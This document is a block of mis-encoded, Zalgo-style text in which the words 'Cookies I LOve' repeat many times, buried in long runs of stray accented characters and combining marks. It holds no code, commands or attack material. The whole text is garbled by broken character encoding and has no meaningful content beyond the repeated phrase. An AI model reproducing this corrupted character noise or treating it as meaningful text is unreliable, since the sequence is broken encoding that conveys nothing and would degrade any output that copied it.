ÍÌŸÌ¹Í™Ì°Ì³ÍˆÍ“Ì¢Ì¬Ì™Ì¢Ì³Ì˜oÌ´ÌÍ ÍÍŒÍ€Í„ÌÌ“ÍÍ‘ÌÌ”Ì¾ÍÌ‡ÌŸÍ‡Ì¯Ì»Ì»Ì¼ÌžÌ£Ì­Ì¡Í–ÌœkÌµÍÌ€Í›Ì…ÍÌ‚Ì’ÍŠÍ›ÍŠÌ±Ì£Ì¨Ì­ÌºÌÌ—ÌŸÌ¹Í•ÌºÌ¼ÌŸÌÌÌ¬ÌŸÍˆÍœÍˆÌŸÌ¹Ì«ÌœÌ™ÌªÌ™Ì©Ì«Ì»iÌ¶ÌšÍ‘Ì…Ì„Í„ÌˆÌ•Ì€ÌšÍ€Ì¿Í†Í”ÌŸÌ—Ì¯Ì¼Í…Ì¡Ì³Ì¥Í–eÌ¸ÌÌ€Í„Í„ÌÌÌÍ‚ÍÌ³Ì¢ÍÍŽÌ¢sÌ·Í’Ì‰ÌŠÌ—Ì–ÍœÌžÌºÌ¦Ì—Í”Ì«Ì¥ÌŸÌ Ì³IÌ¶ÌšÍÌ„Ì†Ì†ÌÌÌ„ÌÌ¿ÌƒÍ„Í„Í‘ÍÌ¬ÌœÍœÌ«Ì¡Ì¦Ì£Ì¡Ì£Ì Í‡Ì¦Ì¦Ì¯Ì³Í‰Ì¼Ì±Ì² ÌµÌ€Í—Ì…ÌÍÍ›ÌŒÌŽÌ›Í Í€Í‹Ì‰Ì”Í›Ì‚ÍƒÌ¿Í„Í’Ì‡Í„ÍŠÍ„Ì¨Ì²Ì±ÌœÍˆÌ™Ì¦Ì¥ÌªÌ£Ì£Í‰Í…Ì°Ì°ÍŽÌ²Ì¦Ì°Ì™LÌ·Í€ÍÌŒÌ«Ì¡Ì©Ì–Ì¼Ì­Ì¨Ì–ÍˆÌŸÌ¢Ì–ÍšÌ³Ì°Ì»Í™Ì¦Ì¯Í“Ì¼Í–ÌÌ±Ì¦Ì³ÍœÌ¼Ì˜OÌ·Í‹ÌÍŒÌ‹ÌŽÌ”Ì…ÌŽÍ Í€Ì‚Í˜ÌŒÌ”ÍŒÍÌ”Í’ÍÍÌÌ€Ì’ÍŠÌ¿Ì±Í‰ÍŽÌ°Ì©Í‰Ì¥ÍŽÌ Í“Í‡Ì¼Ì¼Ì¨vÌµÌ‘ÍÍ€ÌƒÌ‡ÍÍ‹Ì›ÍÍÌ”ÌÍ„Ì¾ÍÍÌÌÌ¹Ì¼Í‡Ì¢Ì²Í•Ì£ÌœÌ°Í…Ì–Í–Ì²ÍœÌœÌ­Í”Ì¬Í“eÌ¶Ì½Ì„ÌÌ•Í‹Ì½Í˜Ì„Í‘Í›Ì’ÌÌƒÌ‹Ì¯ÍœÌ˜Í‰ÌœÌ°Ì¼Ì˜Í•Í“Í–Ì³Ì¬ÌžÌœÌ«ÌªÌŸÍ–ÍˆÌ» Ì¸Ì‘Ì‚Í€ÌˆÍ Ì•Í€Í„Ì¾ÍŠÌ‚Í„Ì¾Í‘ÌŽÍŠÍ‹Í‚Í‚Ì…Í†Í†ÌˆÍ€Ì˜Ì Ì˜Ì¡Ì¯Ì¦Ì«Ì¬ÌžÌ¤Ì®Ì¥Ì Ì­ÌºÌ¤Ì™CÌ¸Í—Í†ÌŠÍŒÌ‘Í›Í„Ì…Ì’ÍƒÍ„Ì½Ì³Ì®Í‡Ì¨Í”Ì—Ì¤Ì¹ÍšÌ Ì®Ì¨ÌÍ“Ì˜Ì²Í”oÌ¸Í„ÍŠÌÌŽÍ€Í‘Ì‘Ì¾ÍŠÌ‰Í›Ì½ÍŒÍÌ½Í†Í†Í‚Ì†ÌŠÌ”Í…Ì Ì ÍÌŸÌ¹Í™Ì°Ì³ÍˆÍ“Ì¢Ì¬Ì™Ì¢Ì³Ì˜oÌ´ÌÍ ÍÍŒÍ€Í„ÌÌ“ÍÍ‘ÌÌ”Ì¾ÍÌ‡ÌŸÍ‡Ì¯Ì»Ì»Ì¼ÌžÌ£Ì­Ì¡Í–ÌœkÌµÍÌ€Í›Ì…ÍÌ‚Ì’ÍŠÍ›ÍŠÌ±Ì£Ì¨Ì­ÌºÌÌ—ÌŸÌ¹Í•ÌºÌ¼ÌŸÌÌÌ¬ÌŸÍˆÍœÍˆÌŸÌ¹Ì«ÌœÌ™ÌªÌ™Ì©Ì«Ì»iÌ¶ÌšÍ‘Ì…Ì„Í„ÌˆÌ•Ì€ÌšÍ€Ì¿Í†Í”ÌŸÌ—Ì¯Ì¼Í…Ì¡Ì³Ì¥Í–eÌ¸ÌÌ€Í„Í„ÌÌÌÍ‚ÍÌ³Ì¢ÍÍŽÌ¢sÌ·Í’Ì‰ÌŠÌ—Ì–ÍœÌžÌºÌ¦Ì—Í”Ì«Ì¥ÌŸÌ Ì³IÌ¶ÌšÍÌ„Ì†Ì†ÌÌÌ„ÌÌ¿ÌƒÍ„Í„Í‘ÍÌ¬ÌœÍœÌ«Ì¡Ì¦Ì£Ì¡Ì£Ì Í‡Ì¦Ì¦Ì¯Ì³Í‰Ì¼Ì±Ì² ÌµÌ€Í—Ì…ÌÍÍ›ÌŒÌŽÌ›Í Í€Í‹Ì‰Ì”Í›Ì‚ÍƒÌ¿Í„Í’Ì‡Í„ÍŠÍ„Ì¨Ì²Ì±ÌœÍˆÌ™Ì¦Ì¥ÌªÌ£Ì£Í‰Í…Ì°Ì°ÍŽÌ²Ì¦Ì°Ì™LÌ·Í€ÍÌŒÌ«Ì¡Ì©Ì–Ì¼Ì­Ì¨Ì–ÍˆÌŸÌ¢Ì–ÍšÌ³Ì°Ì»Í™Ì¦Ì¯Í“Ì¼Í–ÌÌ±Ì¦Ì³ÍœÌ¼Ì˜OÌ·Í‹ÌÍŒÌ‹ÌŽÌ”Ì…ÌŽÍ Í€Ì‚Í˜ÌŒÌ”ÍŒÍÌ”Í’ÍÍÌÌ€Ì’ÍŠÌ¿Ì±Í‰ÍŽÌ°Ì©Í‰Ì¥ÍŽÌ Í“Í‡Ì¼Ì¼Ì¨vÌµÌ‘ÍÍ€ÌƒÌ‡ÍÍ‹Ì›ÍÍÌ”ÌÍ„Ì¾ÍÍÌÌÌ¹Ì¼Í‡Ì¢Ì²Í•Ì£ÌœÌ°Í…Ì–Í–Ì²ÍœÌœÌ­Í”Ì¬Í“eÌ¶Ì½Ì„ÌÌ•Í‹Ì½Í˜Ì„Í‘Í›Ì’ÌÌƒÌ‹Ì¯ÍœÌ˜Í‰ÌœÌ°Ì¼Ì˜Í•Í“Í–Ì³Ì¬ÌžÌœÌ«ÌªÌŸÍ–ÍˆÌ» Ì¸Ì‘Ì‚Í€ÌˆÍ Ì•Í€Í„Ì¾ÍŠÌ‚Í„Ì¾Í‘ÌŽÍŠÍ‹Í‚Í‚Ì…Í†Í†ÌˆÍ€Ì˜Ì Ì˜Ì¡Ì¯Ì¦Ì«Ì¬ÌžÌ¤Ì®Ì¥Ì Ì­ÌºÌ¤Ì™CÌ¸Í—Í†ÌŠÍŒÌ‘Í›Í„Ì…Ì’ÍƒÍ„Ì½Ì³Ì®Í‡Ì¨Í”Ì—Ì¤Ì¹ÍšÌ Ì®Ì¨ÌÍ“Ì˜Ì²Í”oÌ¸Í„ÍŠÌÌŽÍ€Í‘Ì‘Ì¾ÍŠÌ‰Í›Ì½ÍŒÍÌ½Í†Í†Í‚Ì†ÌŠÌ”Í…Ì Ì ÍÌŸÌ¹Í™Ì°Ì³ÍˆÍ“Ì¢Ì¬Ì™Ì¢Ì³Ì˜oÌ´ÌÍ ÍÍŒÍ€Í„ÌÌ“ÍÍ‘ÌÌ”Ì¾ÍÌ‡ÌŸÍ‡Ì¯Ì»Ì»Ì¼ÌžÌ£Ì­Ì¡Í–ÌœkÌµÍÌ€Í›Ì…ÍÌ‚Ì’ÍŠÍ›ÍŠÌ±Ì£Ì¨Ì­ÌºÌÌ—ÌŸÌ¹Í•ÌºÌ¼ÌŸÌÌÌ¬ÌŸÍˆÍœÍˆÌŸÌ¹Ì«ÌœÌ™ÌªÌ™Ì©Ì«Ì»iÌ¶ÌšÍ‘Ì…Ì„Í„ÌˆÌ•Ì€ÌšÍ€Ì¿Í†Í”ÌŸÌ—Ì¯Ì¼Í…Ì¡Ì³Ì¥Í–eÌ¸ÌÌ€Í„Í„ÌÌÌÍ‚ÍÌ³Ì¢ÍÍŽÌ¢sÌ·Í’Ì‰ÌŠÌ—Ì–ÍœÌžÌºÌ¦Ì—Í”Ì«Ì¥ÌŸÌ Ì³IÌ¶ÌšÍÌ„Ì†Ì†ÌÌÌ„ÌÌ¿ÌƒÍ„Í„Í‘ÍÌ¬ÌœÍœÌ«Ì¡Ì¦Ì£Ì¡Ì£Ì Í‡Ì¦Ì¦Ì¯Ì³Í‰Ì¼Ì±Ì² ÌµÌ€Í—Ì…ÌÍÍ›ÌŒÌŽÌ›Í Í€Í‹Ì‰Ì”Í›Ì‚ÍƒÌ¿Í„Í’Ì‡Í„ÍŠÍ„Ì¨Ì²Ì±ÌœÍˆÌ™Ì¦Ì¥ÌªÌ£Ì£Í‰Í…Ì°Ì°ÍŽÌ²Ì¦Ì°Ì™LÌ·Í€ÍÌŒÌ«Ì¡Ì©Ì–Ì¼Ì­Ì¨Ì–ÍˆÌŸÌ¢Ì–ÍšÌ³Ì°Ì»Í™Ì¦Ì¯Í“Ì¼Í–ÌÌ±Ì¦Ì³ÍœÌ¼Ì˜OÌ·Í‹ÌÍŒÌ‹ÌŽÌ”Ì…ÌŽÍ Í€Ì‚Í˜ÌŒÌ”ÍŒÍÌ”Í’ÍÍÌÌ€Ì’ÍŠÌ¿Ì±Í‰ÍŽÌ°Ì©Í‰Ì¥ÍŽÌ Í“Í‡Ì¼Ì¼Ì¨vÌµÌ‘ÍÍ€ÌƒÌ‡ÍÍ‹Ì›ÍÍÌ”ÌÍ„Ì¾ÍÍÌÌÌ¹Ì¼Í‡Ì¢Ì²Í•Ì£ÌœÌ°Í…Ì–Í–Ì²ÍœÌœÌ­Í”Ì¬Í“eÌ¶Ì½Ì„ÌÌ•Í‹Ì½Í˜Ì„Í‘Í›Ì’ÌÌƒÌ‹Ì¯ÍœÌ˜Í‰ÌœÌ°Ì¼Ì˜Í•Í“Í–Ì³Ì¬ÌžÌœÌ«ÌªÌŸÍ–ÍˆÌ» Ì¸Ì‘Ì‚Í€ÌˆÍ Ì•Í€Í„Ì¾ÍŠÌ‚Í„Ì¾Í‘ÌŽÍŠÍ‹Í‚Í‚Ì…Í†Í†ÌˆÍ€Ì˜Ì Ì˜Ì¡Ì¯Ì¦Ì«Ì¬ÌžÌ¤Ì®Ì¥Ì Ì­ÌºÌ¤Ì™CÌ¸Í—Í†ÌŠÍŒÌ‘Í›Í„Ì…Ì’ÍƒÍ„Ì½Ì³Ì®Í‡Ì¨Í”Ì—Ì¤Ì¹ÍšÌ Ì®Ì¨ÌÍ“Ì˜Ì²Í”oÌ¸Í„ÍŠÌÌŽÍ€Í‘Ì‘Ì¾ÍŠÌ‰Í›Ì½ÍŒÍÌ½Í†Í†Í‚Ì†ÌŠÌ”Í…Ì Ì ÍÌŸÌ¹Í™Ì°Ì³ÍˆÍ“Ì¢Ì¬Ì™Ì¢Ì³Ì˜oÌ´ÌÍ ÍÍŒÍ€Í„ÌÌ“ÍÍ‘ÌÌ”Ì¾ÍÌ‡ÌŸÍ‡Ì¯Ì»Ì»Ì¼ÌžÌ£Ì­Ì¡Í–ÌœkÌµÍÌ€Í›Ì…ÍÌ‚Ì’ÍŠÍ›ÍŠÌ±Ì£Ì¨Ì­ÌºÌÌ—ÌŸÌ¹Í•ÌºÌ¼ÌŸÌÌÌ¬ÌŸÍˆÍœÍˆÌŸÌ¹Ì«ÌœÌ™ÌªÌ™Ì©Ì«Ì»iÌ¶ÌšÍ‘Ì…Ì„Í„ÌˆÌ•Ì€ÌšÍ€Ì¿Í†Í”ÌŸÌ—Ì¯Ì¼Í…Ì¡Ì³Ì¥Í–eÌ¸ÌÌ€Í„Í„ÌÌÌÍ‚ÍÌ³Ì¢ÍÍŽÌ¢sÌ·Í’Ì‰ÌŠÌ—Ì–ÍœÌžÌºÌ¦Ì—Í”Ì«Ì¥ÌŸÌ Ì³IÌ¶ÌšÍÌ„Ì†Ì†ÌÌÌ„ÌÌ¿ÌƒÍ„Í„Í‘ÍÌ¬ÌœÍœÌ«Ì¡Ì¦Ì£Ì¡Ì£Ì Í‡Ì¦Ì¦Ì¯Ì³Í‰Ì¼Ì±Ì² ÌµÌ€Í—Ì…ÌÍÍ›ÌŒÌŽÌ›Í Í€Í‹Ì‰Ì”Í›Ì‚ÍƒÌ¿Í„Í’Ì‡Í„ÍŠÍ„Ì¨Ì²Ì±ÌœÍˆÌ™Ì¦Ì¥ÌªÌ£Ì£Í‰Í…Ì°Ì°ÍŽÌ²Ì¦Ì°Ì™LÌ·Í€ÍÌŒÌ«Ì¡Ì©Ì–Ì¼Ì­Ì¨Ì–ÍˆÌŸÌ¢Ì–ÍšÌ³Ì°Ì»Í™Ì¦Ì¯Í“Ì¼Í–ÌÌ±Ì¦Ì³ÍœÌ¼Ì˜OÌ·Í‹ÌÍŒÌ‹ÌŽÌ”Ì…ÌŽÍ Í€Ì‚Í˜ÌŒÌ”ÍŒÍÌ”Í’ÍÍÌÌ€Ì’ÍŠÌ¿Ì±Í‰ÍŽÌ°Ì©Í‰Ì¥ÍŽÌ Í“Í‡Ì¼Ì¼Ì¨vÌµÌ‘ÍÍ€ÌƒÌ‡ÍÍ‹Ì›ÍÍÌ”ÌÍ„Ì¾ÍÍÌÌÌ¹Ì¼Í‡Ì¢Ì²Í•Ì£ÌœÌ°Í…Ì–Í–Ì²ÍœÌœÌ­Í”Ì¬Í“eÌ¶Ì½Ì„ÌÌ•Í‹Ì½Í˜Ì„Í‘Í›Ì’ÌÌƒÌ‹Ì¯ÍœÌ˜Í‰ÌœÌ°Ì¼Ì˜Í•Í“Í–Ì³Ì¬ÌžÌœÌ«ÌªÌŸÍ–ÍˆÌ» Ì¸Ì‘Ì‚Í€ÌˆÍ Ì•Í€Í„Ì¾ÍŠÌ‚Í„Ì¾Í‘ÌŽÍŠÍ‹Í‚Í‚Ì…Í†Í†ÌˆÍ€Ì˜Ì Ì˜Ì¡Ì¯Ì¦Ì«Ì¬ÌžÌ¤Ì®Ì¥Ì Ì­ÌºÌ¤Ì™CÌ¸Í—Í†ÌŠÍŒÌ‘Í›Í„Ì…Ì’ÍƒÍ„Ì½Ì³Ì®Í‡Ì¨Í”Ì—Ì¤Ì¹ÍšÌ Ì®Ì¨ÌÍ“Ì˜Ì²Í”oÌ¸Í„ÍŠÌÌŽÍ€Í‘Ì‘Ì¾ÍŠÌ‰Í›Ì½ÍŒÍÌ½Í†Í†Í‚Ì†ÌŠÌ”Í…Ì Ì ÍÌŸÌ¹Í™Ì°Ì³ÍˆÍ“Ì¢Ì¬Ì™Ì¢Ì³Ì˜oÌ´ÌÍ ÍÍŒÍ€Í„ÌÌ“ÍÍ‘ÌÌ”Ì¾ÍÌ‡ÌŸÍ‡Ì¯Ì»Ì»Ì¼ÌžÌ£Ì­Ì¡Í–ÌœkÌµÍÌ€Í›Ì…ÍÌ‚Ì’ÍŠÍ›ÍŠÌ±Ì£Ì¨Ì­ÌºÌÌ—ÌŸÌ¹Í•ÌºÌ¼ÌŸÌÌÌ¬ÌŸÍˆÍœÍˆÌŸÌ¹Ì«ÌœÌ™ÌªÌ™Ì©Ì«Ì»iÌ¶ÌšÍ‘Ì…Ì„Í„ÌˆÌ•Ì€ÌšÍ€Ì¿Í†Í”ÌŸÌ—Ì¯Ì¼Í…Ì¡Ì³Ì¥Í–eÌ¸ÌÌ€Í„Í„ÌÌÌÍ‚ÍÌ³Ì¢ÍÍŽÌ¢sÌ·Í’Ì‰ÌŠÌ—Ì–ÍœÌžÌºÌ¦Ì—Í”Ì«Ì¥ÌŸÌ Ì³IÌ¶ÌšÍÌ„Ì†Ì†ÌÌÌ„ÌÌ¿ÌƒÍ„Í„Í‘ÍÌ¬ÌœÍœÌ«Ì¡Ì¦Ì£Ì¡Ì£Ì Í‡Ì¦Ì¦Ì¯Ì³Í‰Ì¼Ì±Ì² ÌµÌ€Í—Ì…ÌÍÍ›ÌŒÌŽÌ›Í Í€Í‹Ì‰Ì”Í›Ì‚ÍƒÌ¿Í„Í’Ì‡Í„ÍŠÍ„Ì¨Ì²Ì±ÌœÍˆÌ™Ì¦Ì¥ÌªÌ£Ì£Í‰Í…Ì°Ì°ÍŽÌ²Ì¦Ì°Ì™LÌ·Í€ÍÌŒÌ«Ì¡Ì©Ì–Ì¼Ì­Ì¨Ì–ÍˆÌŸÌ¢Ì–ÍšÌ³Ì°Ì»Í™Ì¦Ì¯Í“Ì¼Í–ÌÌ±Ì¦Ì³ÍœÌ¼Ì˜OÌ·Í‹ÌÍŒÌ‹ÌŽÌ”Ì…ÌŽÍ Í€Ì‚Í˜ÌŒÌ”ÍŒÍÌ”Í’ÍÍÌÌ€Ì’ÍŠÌ¿Ì±Í‰ÍŽÌ°Ì©Í‰Ì¥ÍŽÌ Í“Í‡Ì¼Ì¼Ì¨vÌµÌ‘ÍÍ€ÌƒÌ‡ÍÍ‹Ì›ÍÍÌ”ÌÍ„Ì¾ÍÍÌÌÌ¹Ì¼Í‡Ì¢Ì²Í•Ì£ÌœÌ°Í…Ì–Í–Ì²ÍœÌœÌ­Í”Ì¬Í“eÌ¶Ì½Ì„ÌÌ•Í‹Ì½Í˜Ì„Í‘Í›Ì’ÌÌƒÌ‹Ì¯ÍœÌ˜Í‰ÌœÌ°Ì¼Ì˜Í•Í“Í–Ì³Ì¬ÌžÌœÌ«ÌªÌŸÍ–ÍˆÌ» Ì¸Ì‘Ì‚Í€ÌˆÍ Ì•Í€Í„Ì¾ÍŠÌ‚Í„Ì¾Í‘ÌŽÍŠÍ‹Í‚Í‚Ì…Í†Í†ÌˆÍ€Ì˜Ì Ì˜Ì¡Ì¯Ì¦Ì«Ì¬ÌžÌ¤Ì®Ì¥Ì Ì­ÌºÌ¤Ì™CÌ¸Í—Í†ÌŠÍŒÌ‘Í›Í„Ì…Ì’ÍƒÍ„Ì½Ì³Ì®Í‡Ì¨Í”Ì—Ì¤Ì¹ÍšÌ Ì®Ì¨ÌÍ“Ì˜Ì²Í”oÌ¸Í„ÍŠÌÌŽÍ€Í‘Ì‘Ì¾ÍŠÌ‰Í›Ì½ÍŒÍÌ½Í†Í†Í‚Ì†ÌŠÌ”Í…Ì Ì ÍÌŸÌ¹Í™Ì°Ì³ÍˆÍ“Ì¢Ì¬Ì™Ì¢Ì³Ì˜oÌ´ÌÍ ÍÍŒÍ€Í„ÌÌ“ÍÍ‘ÌÌ”Ì¾ÍÌ‡ÌŸÍ‡Ì¯Ì»Ì»Ì¼ÌžÌ£Ì­Ì¡Í–ÌœkÌµÍÌ€Í›Ì…ÍÌ‚Ì’ÍŠÍ›ÍŠÌ±Ì£Ì¨Ì­ÌºÌÌ—ÌŸÌ¹Í•ÌºÌ¼ÌŸÌÌÌ¬ÌŸÍˆÍœÍˆÌŸÌ¹Ì«ÌœÌ™ÌªÌ™Ì©Ì«Ì»iÌ¶ÌšÍ‘Ì…Ì„Í„ÌˆÌ•Ì€ÌšÍ€Ì¿Í†Í”ÌŸÌ—Ì¯Ì¼Í…Ì¡Ì³Ì¥Í–eÌ¸ÌÌ€Í„Í„ÌÌÌÍ‚ÍÌ³Ì¢ÍÍŽÌ¢sÌ·Í’Ì‰ÌŠÌ—Ì–ÍœÌžÌºÌ¦Ì—Í”Ì«Ì¥ÌŸÌ Ì³IÌ¶ÌšÍÌ„Ì†Ì†ÌÌÌ„ÌÌ¿ÌƒÍ„Í„Í‘ÍÌ¬ÌœÍœÌ«Ì¡Ì¦Ì£Ì¡Ì£Ì Í‡Ì¦Ì¦Ì¯Ì³Í‰Ì¼Ì±Ì² ÌµÌ€Í—Ì…ÌÍÍ›ÌŒÌŽÌ›Í Í€Í‹Ì‰Ì”Í›Ì‚ÍƒÌ¿Í„Í’Ì‡Í„ÍŠÍ„Ì¨Ì²Ì±ÌœÍˆÌ™Ì¦Ì¥ÌªÌ£Ì£Í‰Í…Ì°Ì°ÍŽÌ²Ì¦Ì°Ì™LÌ·Í€ÍÌŒÌ«Ì¡Ì©Ì–Ì¼Ì­Ì¨Ì–ÍˆÌŸÌ¢Ì–ÍšÌ³Ì°Ì»Í™Ì¦Ì¯Í“Ì¼Í–ÌÌ±Ì¦Ì³ÍœÌ¼Ì˜OÌ·Í‹ÌÍŒÌ‹ÌŽÌ”Ì…ÌŽÍ Í€Ì‚Í˜ÌŒÌ”ÍŒÍÌ”Í’ÍÍÌÌ€Ì’ÍŠÌ¿Ì±Í‰ÍŽÌ°Ì©Í‰Ì¥ÍŽÌ Í“Í‡Ì¼Ì¼Ì¨vÌµÌ‘ÍÍ€ÌƒÌ‡ÍÍ‹Ì›ÍÍÌ”ÌÍ„Ì¾ÍÍÌÌÌ¹Ì¼Í‡Ì¢Ì²Í•Ì£ÌœÌ°Í…Ì–Í–Ì²ÍœÌœÌ­Í”Ì¬Í“eÌ¶Ì½Ì„ÌÌ•Í‹Ì½Í˜Ì„Í‘Í›Ì’ÌÌƒÌ‹Ì¯ÍœÌ˜Í‰ÌœÌ°Ì¼Ì˜Í•Í“Í–Ì³Ì¬ÌžÌœÌ«ÌªÌŸÍ–ÍˆÌ» Ì¸Ì‘Ì‚Í€ÌˆÍ Ì•Í€Í„Ì¾ÍŠÌ‚Í„Ì¾Í‘ÌŽÍŠÍ‹Í‚Í‚Ì…Í†Í†ÌˆÍ€Ì˜Ì Ì˜Ì¡Ì¯Ì¦Ì«Ì¬ÌžÌ¤Ì®Ì¥Ì Ì­ÌºÌ¤Ì™CÌ¸Í—Í†ÌŠÍŒÌ‘Í›Í„Ì…Ì’ÍƒÍ„Ì½Ì³Ì®Í‡Ì¨Í”Ì—Ì¤Ì¹ÍšÌ Ì®Ì¨ÌÍ“Ì˜Ì²Í”oÌ¸Í„ÍŠÌÌŽÍ€Í‘Ì‘Ì¾ÍŠÌ‰Í›Ì½ÍŒÍÌ½Í†Í†Í‚Ì†ÌŠÌ”Í…Ì Ì ÍÌŸÌ¹Í™Ì°Ì³ÍˆÍ“Ì¢Ì¬Ì™Ì¢Ì³Ì˜oÌ´ÌÍ ÍÍŒÍ€Í„ÌÌ“ÍÍ‘ÌÌ”Ì¾ÍÌ‡ÌŸÍ‡Ì¯Ì»Ì»Ì¼ÌžÌ£Ì­Ì¡Í–ÌœkÌµÍÌ€Í›Ì…ÍÌ‚Ì’ÍŠÍ›ÍŠÌ±Ì£Ì¨Ì­ÌºÌÌ—ÌŸÌ¹Í•ÌºÌ¼ÌŸÌÌÌ¬ÌŸÍˆÍœÍˆÌŸÌ¹Ì«ÌœÌ™ÌªÌ™Ì©Ì«Ì»iÌ¶ÌšÍ‘Ì…Ì„Í„ÌˆÌ•Ì€ÌšÍ€Ì¿Í†Í”ÌŸÌ—Ì¯Ì¼Í…Ì¡Ì³Ì¥Í–eÌ¸ÌÌ€Í„Í„ÌÌÌÍ‚ÍÌ³Ì¢ÍÍŽÌ¢sÌ·Í’Ì‰ÌŠÌ—Ì–ÍœÌžÌºÌ¦Ì—Í”Ì«Ì¥ÌŸÌ Ì³IÌ¶ÌšÍÌ„Ì†Ì†ÌÌÌ„ÌÌ¿ÌƒÍ„Í„Í‘ÍÌ¬ÌœÍœÌ«Ì¡Ì¦Ì£Ì¡Ì£Ì Í‡Ì¦Ì¦Ì¯Ì³Í‰Ì¼Ì±Ì² ÌµÌ€Í—Ì…ÌÍÍ›ÌŒÌŽÌ›Í Í€Í‹Ì‰Ì”Í›Ì‚ÍƒÌ¿Í„Í’Ì‡Í„ÍŠÍ„Ì¨Ì²Ì±ÌœÍˆÌ™Ì¦Ì¥ÌªÌ£Ì£Í‰Í…Ì°Ì°ÍŽÌ²Ì¦Ì°Ì™LÌ·Í€ÍÌŒÌ«Ì¡Ì©Ì–Ì¼Ì­Ì¨Ì–ÍˆÌŸÌ¢Ì–ÍšÌ³Ì°Ì»Í™Ì¦Ì¯Í“Ì¼Í–ÌÌ±Ì¦Ì³ÍœÌ¼Ì˜OÌ·Í‹ÌÍŒÌ‹ÌŽÌ”Ì…ÌŽÍ Í€Ì‚Í˜ÌŒÌ”ÍŒÍÌ”Í’ÍÍÌÌ€Ì’ÍŠÌ¿Ì±Í‰ÍŽÌ°Ì©Í‰Ì¥ÍŽÌ Í“Í‡Ì¼Ì¼Ì¨vÌµÌ‘ÍÍ€ÌƒÌ‡ÍÍ‹Ì›ÍÍÌ”ÌÍ„Ì¾ÍÍÌÌÌ¹Ì¼Í‡Ì¢Ì²Í•Ì£ÌœÌ°Í…Ì–Í–Ì²ÍœÌœÌ­Í”Ì¬Í“eÌ¶Ì½Ì„ÌÌ•Í‹Ì½Í˜Ì„Í‘Í›Ì’ÌÌƒÌ‹Ì¯ÍœÌ˜Í‰ÌœÌ°Ì¼Ì˜Í•Í“Í–Ì³Ì¬ÌžÌœÌ«ÌªÌŸÍ–ÍˆÌ» Ì¸Ì‘Ì‚Í€ÌˆÍ Ì•Í€Í„Ì¾ÍŠÌ‚Í„Ì¾Í‘ÌŽÍŠÍ‹Í‚Í‚Ì…Í†Í†ÌˆÍ€Ì˜Ì Ì˜Ì¡Ì¯Ì¦Ì«Ì¬ÌžÌ¤Ì®Ì¥Ì Ì­ÌºÌ¤Ì™CÌ¸Í—Í†ÌŠÍŒÌ‘Í›Í„Ì…Ì’ÍƒÍ„Ì½Ì³Ì®Í‡Ì¨Í”Ì—Ì¤Ì¹ÍšÌ Ì®Ì¨ÌÍ“Ì˜Ì²Í”oÌ¸Í„ÍŠÌÌŽÍ€Í‘Ì‘Ì¾ÍŠÌ‰Í›Ì½ÍŒÍÌ½Í†Í†Í‚Ì†ÌŠÌ”Í…Ì Ì ÍÌŸÌ¹Í™Ì°Ì³ÍˆÍ“Ì¢Ì¬Ì™Ì¢Ì³Ì˜oÌ´ÌÍ ÍÍŒÍ€Í„ÌÌ“ÍÍ‘ÌÌ”Ì¾ÍÌ‡ÌŸÍ‡Ì¯Ì»Ì»Ì¼ÌžÌ£Ì­Ì¡Í–ÌœkÌµÍÌ€Í›Ì…ÍÌ‚Ì’ÍŠÍ›ÍŠÌ±Ì£Ì¨Ì­ÌºÌÌ—ÌŸÌ¹Í•ÌºÌ¼ÌŸÌÌÌ¬ÌŸÍˆÍœÍˆÌŸÌ¹Ì«ÌœÌ™ÌªÌ™Ì©Ì«Ì»iÌ¶ÌšÍ‘Ì…Ì„Í„ÌˆÌ•Ì€ÌšÍ€Ì¿Í†Í”ÌŸÌ—Ì¯Ì¼Í…Ì¡Ì³Ì¥Í–eÌ¸ÌÌ€Í„Í„ÌÌÌÍ‚ÍÌ³Ì¢ÍÍŽÌ¢sÌ·Í’Ì‰ÌŠÌ—Ì–ÍœÌžÌºÌ¦Ì—Í”Ì«Ì¥ÌŸÌ Ì³IÌ¶ÌšÍÌ„Ì†Ì†ÌÌÌ„ÌÌ¿ÌƒÍ„Í„Í‘ÍÌ¬ÌœÍœÌ«Ì¡Ì¦Ì£Ì¡Ì£Ì Í‡Ì¦Ì¦Ì¯Ì³Í‰Ì¼Ì±Ì² ÌµÌ€Í—Ì…ÌÍÍ›ÌŒÌŽÌ›Í Í€Í‹Ì‰Ì”Í›Ì‚ÍƒÌ¿Í„Í’Ì‡Í„ÍŠÍ„Ì¨Ì²Ì±ÌœÍˆÌ™Ì¦Ì¥ÌªÌ£Ì£Í‰Í…Ì°Ì°ÍŽÌ²Ì¦Ì°Ì™LÌ·Í€ÍÌŒÌ«Ì¡Ì©Ì–Ì¼Ì­Ì¨Ì–ÍˆÌŸÌ¢Ì–ÍšÌ³Ì°Ì»Í™Ì¦Ì¯Í“Ì¼Í–ÌÌ±Ì¦Ì³ÍœÌ¼Ì˜OÌ·Í‹ÌÍŒÌ‹ÌŽÌ”Ì…ÌŽÍ Í€Ì‚Í˜ÌŒÌ”ÍŒÍÌ”Í’ÍÍÌÌ€Ì’ÍŠÌ¿Ì±Í‰ÍŽÌ°Ì©Í‰Ì¥ÍŽÌ Í“Í‡Ì¼Ì¼Ì¨vÌµÌ‘ÍÍ€ÌƒÌ‡ÍÍ‹Ì›ÍÍÌ”ÌÍ„Ì¾ÍÍÌÌÌ¹Ì¼Í‡Ì¢Ì²Í•Ì£ÌœÌ°Í…Ì–Í–Ì²ÍœÌœÌ­Í”Ì¬Í“eÌ¶Ì½Ì„ÌÌ•Í‹Ì½Í˜Ì„Í‘Í›Ì’ÌÌƒÌ‹Ì¯ÍœÌ˜Í‰ÌœÌ°Ì¼Ì˜Í•Í“Í–Ì³Ì¬ÌžÌœÌ«ÌªÌŸÍ–ÍˆÌ» Ì¸Ì‘Ì‚Í€ÌˆÍ Ì•Í€Í„Ì¾ÍŠÌ‚Í„Ì¾Í‘ÌŽÍŠÍ‹Í‚Í‚Ì…Í†Í†ÌˆÍ€Ì˜Ì Ì˜Ì¡Ì¯Ì¦Ì«Ì¬ÌžÌ¤Ì®Ì¥Ì Ì­ÌºÌ¤Ì™CÌ¸Í—Í†ÌŠÍŒÌ‘Í›Í„Ì…Ì’ÍƒÍ„Ì½Ì³Ì®Í‡Ì¨Í”Ì—Ì¤Ì¹ÍšÌ Ì®Ì¨ÌÍ“Ì˜Ì²Í”oÌ¸Í„ÍŠÌÌŽÍ€Í‘Ì‘Ì¾ÍŠÌ‰Í›Ì½ÍŒÍÌ½Í†Í†Í‚Ì†ÌŠÌ”Í…Ì Ì ÍÌŸÌ¹Í™Ì°Ì³ÍˆÍ“Ì¢Ì¬Ì™Ì¢Ì³Ì˜oÌ´ÌÍ 